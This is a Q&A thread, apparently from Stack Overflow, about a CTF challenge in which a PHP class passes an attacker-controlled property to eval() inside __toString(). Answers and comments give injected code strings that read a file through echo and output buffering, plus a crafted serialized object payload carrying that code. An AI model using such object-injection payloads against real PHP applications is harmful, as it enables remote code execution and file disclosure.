# Implementation of __toString() using eval() in PHP

Tags: php, ctf

I am looking for a way to implement the __toString method using only eval in PHP. The end goal is to be able to read a file. Note that this is part of a CTF challenge and not a real world application.

I am given the following implementation

```
function __toString(){
     eval($this->var);
}
```

Since $var is under my control I can set if to whatever I want.
So far I've tried the following without success:

```
$var = "return file_get_contents('file.txt');"
```

### Any hints?

**UPDATE**:
The relevant code looks as follows:

```
class MyClass{
    private $var;
    function __toString(){
        if (isset($this->var) eval($this->var);
    }
}
```

Comment: `return` returns from the eval, try also `return eval($this->var);`

Comment: @vivek_23 I tried without and no success so far. :-/

Comment: @AbraCadaver Unfortunately I cannot change the function. The only thing I control is $var.

Comment: Then all you can do is `echo file_get_contents('file.txt');`

Answer (score 0):

If you check the doc, you will see that `function __toString()` must return a string. So whatever you do inside of the `__toString()` method, just make sure that you return a string. It's great that you have mentioned that this is not for a real world application. Because eval() can be quite dangerous and can give unexpected results.

Also, if va is really under your control, why not just do the following ...

```php
$this->var = file_get_contents('file.txt');
//...
function __toString(){
     return $this->var;
}
```

One final thought ... If you are doing `$var = "return file_get_contents('file.txt');"`, that's not the same thing as doing `$this->var = "return file_get_contents('file.txt');"`

Comment: Thanks for your answer. What I mean by having control is I cant set $this->var as I wish. However I cannot change __toString() implementation.

Comment: Ok. That's a tough one. Maybe we need more context.

Answer (score 0):

You could `echo` inside `$var` itself.

```
$var = "echo file_get_contents('input.txt');";
```

If you don't want to print anything on the screen and just get the file contents, you could use output buffering. I used [ob_start()](https://www.php.net/manual/en/function.ob-start.php) and [ob_get_clean()](https://www.php.net/manual/en/function.ob-get-clean.php).

```
<?php

$var = "ob_start();echo file_get_contents('input.txt');";

eval($var);// your __toString() function call here.

$file_contents = ob_get_clean();

echo $file_contents;
```

Comment: That looks nice! I tried it locally, I get an error but the echo still goes through, but It's not working on the remote server. After some digging I found out that the remote server is running PHP 5.5.9.  In the challenge I get a 'Terminal output' where I can see the errors

Comment: @MarcIlunga Can you share the challenge link? Also, PHP version shouldn't be an issue.

Comment: Unfortunately I can't really share the challenge link since it is private.  What I don't understand is that locally it throws a recoverable error but still prints the value and remotely it doesn't print anything

Comment: @MarcIlunga I can't tell you much without looking at the challenge myself. Also, the code I pasted works perfectly fine on my machine. There is a possibility that output buffering feature might be turned off on the server your code is getting executed on.

Comment: I have updated the question with the only portion of the source code that I got.
This is really the only thing I've got in this challenge

Comment: @MarcIlunga So, can you modify the value inside `$this->var` ? Do they provide any getters and setters for that?

Comment: No, no getter nor setters provided.. What I try to do is recreate the class locally and set ```$this->hook``` to the code I want. Then, I create an object and serialize it.
So I end up with a payload like this: ```O:8:"Myclass":1:{s:14:" MyClass var";s:25:"ob_start(); print_flag();";}```

Comment: Thanks for hanging on with me. ;). I'll move the discussion to chat

Comment: Let us [continue this discussion in chat](https://chat.stackoverflow.com/rooms/192226/discussion-between-marc-ilunga-and-vivek-23).

Comment: @MarcIlunga I am unable to understand your code and it's context.